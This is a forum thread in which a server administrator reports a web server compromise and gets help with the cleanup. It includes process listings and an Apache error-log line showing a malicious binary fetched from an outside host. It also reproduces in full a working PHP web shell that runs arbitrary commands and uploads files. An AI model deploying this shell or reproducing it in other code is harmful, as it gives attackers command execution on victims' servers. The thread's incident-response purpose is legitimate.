fallout from exploit - please explain the AddHandler cgi-script in .htdocs

stardotstar · 08-05-2009, 05:56 PM

Hi Guys,

Been attacked - rather efficiently and effectively actually.
I had a world writable folder in a well known GPL application (and images folder) that turned out to contain several malicious binaries, php scripts and configs.

The attack was from sources unknown to me (but my logs have the source of the uploads) and the target was a neighbouring host so the data that got shipped when the scripts fired was massive.

Anyway, I have been reading around on ways of tightening my security, which is by no means inadequete in many ways.

I have .htaccess with directory listing prohibited

Code:

Options -Indexes

and I have been advised to use this in my world writable directories - for uploaded attachments/avatars etc etc

Code:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .html .shtml .sh .cgi
Options -ExecCGI

I have had a look at the apache docs about this but I am unsure as to how it makes the site more secure from outside attack, especially when the attack is by a script uploaded to the localhost and then triggered to run from there...

Best regards and TIA
\\'

unSpawn · 08-06-2009, 01:42 AM

Quote:

Originally Posted by stardotstar

I had a world writable folder in a well known GPL application (and images folder) that turned out to contain several malicious binaries, php scripts and configs.

Unless you deleted those without looking, can I ask for a copy of contents?

Quote:

Originally Posted by stardotstar

I am unsure as to how it makes the site more secure from outside attack, especially when the attack is by a script uploaded to the localhost and then triggered to run from there...

I don't understand either. To me this says "Override configured (ScriptAlias) directives for this directory and force files with these extensions to be executed as a CGI in this directory", so if somebody uploads a shell script or PHP shell all they have to do is access the URI to be able to use it.

More importantly you allow world writable directories wich might make some things easier (as you know by now) but is a bad thing. I'd suggest you fix that first.

stardotstar · 08-06-2009, 06:54 AM

yes, unSpawn, the world writable thing is the thing.

I have all the stuff from the attack.

Can I publish the php scripts here?

The munitions seem to be:

Code:

helios exploit # ./httpd --help
./httpd: invalid option -- '-'

iroffer v1.4.b01 [20040901211948] by PMG, see http://iroffer.org/

(..)
helios exploit # ./x --help
XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002

...follows:

Code:

helios exploit # cat murqdh.php 
<

and a large and evil looking script that begins thus:

Code:

helios exploit # cat rfrcew.php

This combination seems to have unleashed a torrent of data initiated by my server against a very neighboring one (one route away) that expended 40G in less than 5 min, the host noticed and took my ports offline.
I monitored top and netstat to see if I could work out what was going on before I started stopping things... (ssh'd via my iLO)

apache was full throttle:

Code:

top - 19:54:25 up 29 days, 21:20,  1 user,  load average: 1.00, 1.01, 1.00
Tasks: 127 total,   2 running, 124 sleeping,   0 stopped,   1 zombie
Cpu(s):  0.0%us, 50.0%sy,  0.0%ni, 50.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   3630412k total,  2963236k used,   667176k free,   524328k buffers
Swap:  1959920k total,      156k used,  1959764k free,  1771116k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND            
16043 apache    20   0  1768  304  188 R  165  0.0  78:29.10 httpd              
    1 root      20   0  1636  544  476 S    0  0.0   0:17.67 init               
    2 root      15  -5     0    0    0 S    0  0.0   0:00.00 kthreadd           
    3 root      RT  -5     0    0    0 S    0  0.0   0:03.05 migration/0        
    4 root      15  -5     0    0    0 S    0  0.0   3:31.88 ksoftirqd/0        
    5 root      RT  -5     0    0    0 S    0  0.0   0:04.58 watchdog/0         
    6 root      RT  -5     0    0    0 S    0  0.0   0:01.35 migration/1        
    7 root      15  -5     0    0    0 S    0  0.0   3:18.87 ksoftirqd/1        
    8 root      RT  -5     0    0    0 S    0  0.0   0:00.17 watchdog/1         
    9 root      RT  -5     0    0    0 S    0  0.0   0:02.83 migration/2        
   10 root      15  -5     0    0    0 S    0  0.0   3:18.46 ksoftirqd/2        
   11 root      RT  -5     0    0    0 S    0  0.0   0:00.16 watchdog/2         
   12 root      RT  -5     0    0    0 S    0  0.0   0:01.25 migration/3        
   13 root      15  -5     0    0    0 S    0  0.0   3:03.70 ksoftirqd/3        
   14 root      RT  -5     0    0    0 S    0  0.0   0:00.15 watchdog/3         
   15 root      15  -5     0    0    0 S    0  0.0   0:14.90 events/0           
   16 root      15  -5     0    0    0 S    0  0.0   0:17.40 events/1           
   17 root      15  -5     0    0    0 S    0  0.0   0:13.38 events/2

BTW that is probably 100% with the watch chopping off at %65.
I stopped apache2 and went looking for recent files:

Code:

find /var/www/ -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort

this showed the offending files straight away modified at the start of the attack - they didn't plant and wait - they must have dumped the munitions and initiated the sequence immediately.
Once I saw the httpd bin I knew it would show in the apache logs

Code:

helios apache2 # grep httpd ./*
./error_log:==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 5908
./error_log:--2009-08-05 18:20:33--  http://lichno.net/step/phpThumb/cache/a/ad/a/httpd
./error_log:Saving to: `httpd'
./error_log:2009-08-05 18:20:54 (15.1 KB/s) - `httpd' saved [306414/306414]

and there it was at the time of the launch fo the attack...
Finally here is the process list at the time the attack was going (but disconnected)

Code:

helios logs-n-snips # cat ps 
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   1636   544 ?        Ss   Jul06   0:17 init [3]  
root         2  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   Jul06   0:03 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   Jul06   3:31 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   Jul06   0:04 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   Jul06   0:01 [migration/1]
root         7  0.0  0.0      0     0 ?        S<   Jul06   3:18 [ksoftirqd/1]
root         8  0.0  0.0      0     0 ?        S<   Jul06   0:00 [watchdog/1]
root         9  0.0  0.0      0     0 ?        S<   Jul06   0:02 [migration/2]
root        10  0.0  0.0      0     0 ?        S<   Jul06   3:18 [ksoftirqd/2]
root        11  0.0  0.0      0     0 ?        S<   Jul06   0:00 [watchdog/2]
root        12  0.0  0.0      0     0 ?        S<   Jul06   0:01 [migration/3]
root        13  0.0  0.0      0     0 ?        S<   Jul06   3:03 [ksoftirqd/3]
root        14  0.0  0.0      0     0 ?        S<   Jul06   0:00 [watchdog/3]
root        15  0.0  0.0      0     0 ?        S<   Jul06   0:14 [events/0]
root        16  0.0  0.0      0     0 ?        S<   Jul06   0:17 [events/1]
root        17  0.0  0.0      0     0 ?        S<   Jul06   0:13 [events/2]
root        18  0.0  0.0      0     0 ?        S<   Jul06   0:17 [events/3]
root        19  0.0  0.0      0     0 ?        S<   Jul06   0:00 [khelper]
root       106  0.0  0.0      0     0 ?        S<   Jul06   0:02 [kblockd/0]
root       107  0.0  0.0      0     0 ?        S<   Jul06   0:01 [kblockd/1]
root       108  0.0  0.0      0     0 ?        S<   Jul06   0:01 [kblockd/2]
root       109  0.0  0.0      0     0 ?        S<   Jul06   0:01 [kblockd/3]
root       111  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kacpid]
root       112  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kacpi_notify]
root       186  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/0]
root       187  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/1]
root       188  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/2]
root       189  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/3]
root       190  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata_aux]
root       191  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ksuspend_usbd]
root       196  0.0  0.0      0     0 ?        S<   Jul06   0:00 [khubd]
root       199  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kseriod]
root       258  0.0  0.0      0     0 ?        S    Jul06   2:53 [pdflush]
root       259  0.0  0.0      0     0 ?        S<   Jul06   0:11 [kswapd0]
root       300  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/0]
root       301  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/1]
root       302  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/2]
root       303  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/3]
root       998  0.0  0.0      0     0 ?        S<   Jul06   0:00 [khpsbpkt]
root      1039  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kpsmoused]
root      1043  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kstriped]
root      1045  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/0]
root      1046  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/1]
root      1047  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/2]
root      1048  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/3]
root      1060  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/0]
root      1061  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/1]
root      1062  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/2]
root      1063  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/3]
root      1071  0.0  0.0      0     0 ?        S<   Jul06   1:24 [kjournald]
root      1175  0.0  0.0   1896   604 ?        S<s  Jul06   0:09 /sbin/udevd --daemon
root      2251  0.0  0.0      0     0 ?        S<   Jul06   3:54 [kjournald]
root      2252  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kjournald]
root      2253  0.0  0.0      0     0 ?        S<   Jul06   0:04 [kjournald]
root      2875  0.0  0.0   3456  1340 ?        Ss   Jul06   0:49 /usr/sbin/syslog-ng
amavis    4010  0.0  1.4  60168 51516 ?        Ss   Jul06   0:25 amavisd (master)
root      4356  0.0  0.0   4204   912 ?        Ss   Jul06   0:00 /usr/sbin/sshd
root      4532  0.0  0.0   1904   708 ?        Ss   Jul06   0:02 /usr/sbin/cron
clamav    4647  0.0  3.5 155604 127988 ?       SNsl Jul13   9:42 /usr/sbin/clamd
clamav    4657  0.0  0.0   3048  1400 ?        SNs  Jul13   0:04 /usr/bin/freshclam -d
apache    4835  0.0  0.3  25456 13516 ?        S    17:46   0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
mysql     5576  6.6  1.9 188284 69712 ?        Ssl  Jul06 2875:49 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
root      5719  0.0  0.0   1620   408 ?        S    Jul06   0:00 /usr/sbin/courierlogger -pid=/var/run/authdaemon.pid -start /usr/lib/courier/courier-authlib/authdaemond
root      5720  0.0  0.0   5276  1228 ?        S    Jul06   0:00 /usr/lib/courier/courier-authlib/authdaemond
root      5724  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5725  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5726  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5727  0.0  0.0   5500  1440 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5728  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5792  0.0  0.0   1716   524 ?        S    Jul06   0:02 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/courier-imapd.indirect Maildir
root      5795  0.0  0.0   1620   476 ?        S    Jul06   0:02 /usr/lib/courier-imap/courierlogger imapd
root      5856  0.0  0.0   1716   516 ?        S    Jul06   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/courier-pop3d.indirect .maildir
root      5859  0.0  0.0   1488   320 ?        S    Jul06   0:00 /usr/lib/courier-imap/courierlogger pop3d
apache    5908  0.0  0.0      0     0 ?        Z    17:48   0:00 [httpd] <defunct>
apache    5909  0.0  0.0   1768   640 ?        S    17:48   0:00 [httpd]                          
root      5914  0.0  0.0   1844   468 ?        Ss   Jul06   0:00 /usr/sbin/gpm -m /dev/input/mice -t ps2
root      6237  0.3  0.0 100576  1040 ?        Ssl  Jul06 132:51 hpasmd
root      6278  0.0  0.0   2492  1412 ?        S    Jul06   0:14 cmathreshd -p 5 -s OK
root      6282  0.0  0.0  10624  1376 ?        S    Jul06  12:19 cmahostd -p 15 -s OK
root      6287  0.0  0.0  10692  1240 ?        Sl   Jul06   0:02 cmapeerd
root      6327  0.0  0.0  18332   916 ?        Sl   Jul06   0:18 cmastdeqd -p 30
root      6334  0.0  0.0  51148   844 ?        Sl   Jul06   2:24 cmahealthd -p 30 -s OK -t OK -i
root      6474  0.0  0.0  10092   788 ?        S    Jul06   0:05 cmaided -p 15 -s OK
root      6482  0.0  0.0   1880   596 ?        S    Jul06   0:01 cmascsid -p 15 -s OK
root      6499  0.0  0.0   1868   564 ?        S    Jul06   0:01 cmasasd -p 15 -s OK
106       7126  0.3  0.4  43868 17344 ?        Ssl  Jul06 131:23 /usr/bin/memcached -d -p 11211 -l 127.0.0.1 -m 512 -c 1024 -u memcached -P /var/run/memcached/memcached-11211.pid
ntop      7186  0.3  1.2 122724 43984 ?        Ssl  Jul06 170:41 /usr/bin/ntop -d -L -u ntop -P /var/lib/ntop
root      7350  0.0  0.0   2064   524 ?        Ss   Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7351  0.0  0.0   2064   484 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7352  0.0  0.0   2064   488 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7353  0.0  0.0   2064   484 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7354  0.0  0.0   2064   484 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
amavis    7400  0.0  1.4  62828 53656 ?        S    15:59   0:02 amavisd (ch7-avail)
root      7416  0.0  0.7  30012 27724 ?        Ss   Jul06   5:42 /usr/sbin/spamd -d -r /var/run/spamd.pid -m 5 -c -H
root      7584  0.0  0.7  30012 25992 ?        S    Jul06   0:01 spamd child
root      7585  0.0  0.7  30012 25900 ?        S    Jul06   0:02 spamd child
apache    9392  0.1  0.3  27060 13772 ?        S    18:28   0:07 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root      9493  0.0  0.1  18308  5984 ?        Sl   Jul06   4:10 /usr/sbin/snmpd -p /var/run/snmpd.pid
root      9616  0.0  0.0   2596  1240 tty1     Ss   Jul06   0:00 /bin/login --            
root      9617  0.0  0.0   1632   460 tty2     Ss+  Jul06   0:00 /sbin/agetty 38400 tty2 linux
root      9618  0.0  0.0   1632   456 tty3     Ss+  Jul06   0:00 /sbin/agetty 38400 tty3 linux
root      9619  0.0  0.0   1632   460 tty4     Ss+  Jul06   0:00 /sbin/agetty 38400 tty4 linux
root      9620  0.0  0.0   1632   464 tty5     Ss+  Jul06   0:00 /sbin/agetty 38400 tty5 linux
root      9621  0.0  0.0   1632   460 tty6     Ss+  Jul06   0:00 /sbin/agetty 38400 tty6 linux
apache   10292  0.0  0.3  24664 12780 ?        S    18:29   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root     10673  0.0  0.0   7012  1812 ?        Ss   Jul07   0:33 /usr/lib/postfix/master
postfix  10677  0.0  0.0   7348  2164 ?        S    Jul07   0:17 qmgr -l -t fifo -u
apache   12108  0.0  0.3  24548 12684 ?        S    18:31   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   12505  0.0  0.3  24528 12644 ?        S    18:32   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   12686  0.1  0.3  25048 13200 ?        S    18:32   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   13889  0.1  0.3  24988 13092 ?        S    18:33   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
amavis   14711  0.0  1.6  69208 60208 ?        S    12:36   0:06 amavisd (ch19-avail)
apache   15948  0.0  0.3  27176 14220 ?        S    18:35   0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   16020  0.0  0.3  24792 12896 ?        S    18:35   0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   16043 99.9  0.0   1768   304 ?        R    18:35  69:33 [httpd]                          
apache   16221  0.0  0.3  24640 12764 ?        S    18:38   0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
postfix  16745  0.0  0.0   7056  1744 ?        S    18:53   0:00 pickup -l -t fifo -u
apache   17268  0.0  0.3  23924 11988 ?        S    19:10   0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
1000     18266  0.0  0.0   3008  1572 tty1     S    19:42   0:00 -bash
root     18302  0.0  0.0   2488  1152 tty1     S    19:43   0:00 su
root     18303  0.0  0.0   2880  1588 tty1     S    19:43   0:00 bash
postfix  18370  0.0  0.0   7196  2000 ?        S    19:44   0:00 smtp -t unix -u
root     18389  0.0  0.0   2276   888 tty1     R+   19:45   0:00 ps aux
root     28969  0.0  0.0      0     0 ?        S    Aug03   0:16 [pdflush]
root     29674  0.0  0.3  22204 11516 ?        Ss   Jul07  22:40 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
named    29761  0.0  0.5  22592 19764 ?        Ss   Jul07   4:38 /usr/sbin/named -u named -n 4 -t /var/chroot/dns
nobody   29798  0.0  0.0   6336  1440 ?        Ss   Jul23   0:16 proftpd: (accepting connections)

Thanks for your interest unSpawn.

Cheers,
\\'

oh and one more I missed:

Code:

helios exploit # cat errors.php 
<body bgcolor="#C0C0C0">Carnivores Team We Own The Net!
<?php

set_magic_quotes_runtime(0);

print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
print "<center><h1>Team Carnivores</h1></center>";
print "<hr><hr>";

$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName  = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
    $currentWD = $SCWD;
}

print "<table>";
print "<tr><td><b>My IP:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>uname -a:</b></td><td>$UName</td></tr>";
print "<tr><td><b>ID:</b></td><td>$UserID</td></tr>";
print "</table>";

print "<hr><hr>";

if( $_POST['_act'] == "List files!" ) {
    $currentCMD = "ls -la";
}

print "<form method=post enctype=\"multipart/form-data\"><table>";

print "<tr><td><b>CMD:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Shoot!\"></td></tr>";

print "<tr><td><b>PWD:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"ls -al\"></td></tr>";

print "<tr><td><b>Inject:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
        print "<center><b>fuckers blocked us try again!</b></center>";
    } else {
        print "<center><pre>";
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "</pre><b>File uploaded baby good work!</b></center>";
    }    
} else {
    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
    system($currentCMD);
    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>ownd Baby</b></center>";
}

exit;

?>

helios exploit #

stardotstar · 08-06-2009, 07:17 AM

UnSpawn , thx for cleaning up - I chopped those code blocks some due to the blobs in them - if you want the bzip of everything I can send u.
Will

unSpawn · 08-06-2009, 07:28 AM

Quote:

Originally Posted by stardotstar

I have all the stuff from the attack. Can I publish the php scripts here?

I'd rather have (the D/L location of) a tarball if that's possible for you. Else lets handle this part by email, OK?

Quote:

Originally Posted by stardotstar

The munitions seem to be:
iroffer v1.4.b01
XHide - Process Faker
murqdh.php
rfrcew.php
(more PHP shells)

Even without more detail this looks like a typical toolkit: some PHP shells to make things easy, std bot, std process hider. I think you handled it pretty quick and from the looks of it pretty good. Point now is finding what conf/SW allowed them access. What runs on top of Apache?

BTW I cleaned up your code, best not leave stuff like that in the open.

stardotstar · 08-06-2009, 07:06 PM

Thanks mate, I appreciate your expertise in helping me not overexpose my server when trying to provide enough info to help me out.

I will move the tarball to somewhere I can point you to, or I will email it.

Cheers,
\\'

unSpawn · 08-06-2009, 08:06 PM

You're welcome. BTW, if you run any PHP-based content management system, you *did* check your site, includes and whatnot just to be safe, right?